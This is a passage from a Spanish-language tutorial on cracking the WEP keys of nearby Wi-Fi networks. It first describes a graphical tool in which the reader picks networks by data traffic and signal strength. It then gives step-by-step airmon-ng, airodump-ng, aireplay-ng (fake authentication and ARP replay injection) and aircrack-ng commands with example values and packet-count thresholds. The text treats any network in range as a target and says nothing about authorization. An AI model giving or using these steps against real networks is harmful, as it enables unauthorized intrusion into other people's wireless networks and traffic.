5. Se nos abre una ventana de advertencia, damos en Ok
6.1 Selecciona todas las casillas de mode selected para lanzar todos los ataques posibles
6.2 Injectión Rate: Radio de inyección viene predeterminado a 500, desplegar menu y poner a 800
6.3 Una vez hecho esto damos al boton Scan, para visualizar las redes al alcance de nuestra tarjeta inhalámbrica.
7. Una vez comenzado el escaneo, se nos abre otra ventana, en la parte inferior, mostrando las redes al alcance asi como su actividad. Aqui debemos fijarnos en la columna de valor #Data, observando las redes cuyo valor sea diferente de 0, esto nos indicará que esta red tiene movimiento de datos, con lo cual nos facilitará la siguiente captura de pantalla.
8. Pasados unos treinta segundos, esta segunda ventana se cierra, y las redes con encriptación wep, pasan a ubicarse en la parte superior de la ventana principal.
En esta ventana, además de tener en cuenta las redes que anteriormente hemos observado que tienen “movimiento de datos” nos tenemos que fijar en el valor PWR, el cual nos indica la proximidad de las redes de la siguiente manera: las que tienen menor valor, son las que más cerca estan de nuestro adaptador, con lo cual son las que debemos elegir preferentemente, para una mejor calidad de conexión.
Una vez seleccionada una red, clicamos en el boton Lanch, y pasaremos a la siguiente captura.
9. En esta pantalla deberemos controlar los valores #Data y #/s (en color verde), que nos van a indicar los paquetes inyectados, y la cantidad de paquetes por segundo respectivamente. Si pasado más de un minuto, no vemos movimiento en estas dos columnas, clicaremos en Abort, y seleccionaremos otra red.
Si por el contrario vemos aumentar la columna señalada en rojo, a gran velocidad, estamos en el buen camino, ya que a partir de 8000 Datas, se lanza automáticamente el ataque aircrack-ng, que tratará de mostrarnos la clave.
10. Al conseguir la clave, la ventana inferior se cierra y se abrirá una nueva mostrandonos dicha clave.
también les dejo el comando en modo consola o terminal
1. airmon-ng
2. airmon-ng stop wlan0
3. airmon-ng start wlan0
4. airmon-ng
5.airodump-ng wlan0
aprietan control + c en la terminal
6. airodump-ng -w (aqui va un nombre cualquiera) -c (aqui va el numero de canal) --bssid (aqui va el numero de la bssid) mon0
ejemplo:
airodump-ng -w oso -c 11 --bssid 00:11:22:33:44:55 mon0
otra terminal
7.- aireplay-ng -1 0 -a (aqui va el bssid) mon0
ejemplo:
aireplay-ng -1 0 -a 00:11:22:33:44:55 mon0
8.- aireplay-ng -3 -b (aqui va el bssid) mon0
ejemplo:
aireplay-ng -3 -b 00:11:22:33:44:55 mon0
otra terminal
9.- aircrack-ng -n 64 -b (aqui va el numero de bssid) aqui va el nombre que le pusieron en el paso 6-01.cap
ejemplo:
aircrack-ng -n 64 -b 00:11:22:33:44:55 oso.01.cap
Minimo necesitan capturar 5000 paquetes, si no le das clave esperen que llegue 1000 mil paquetes a asi sucesivamente. Con 15000 ya hes un hecho que la contraseña ya lo descifra.
Descarga:
Descarga Diccionario: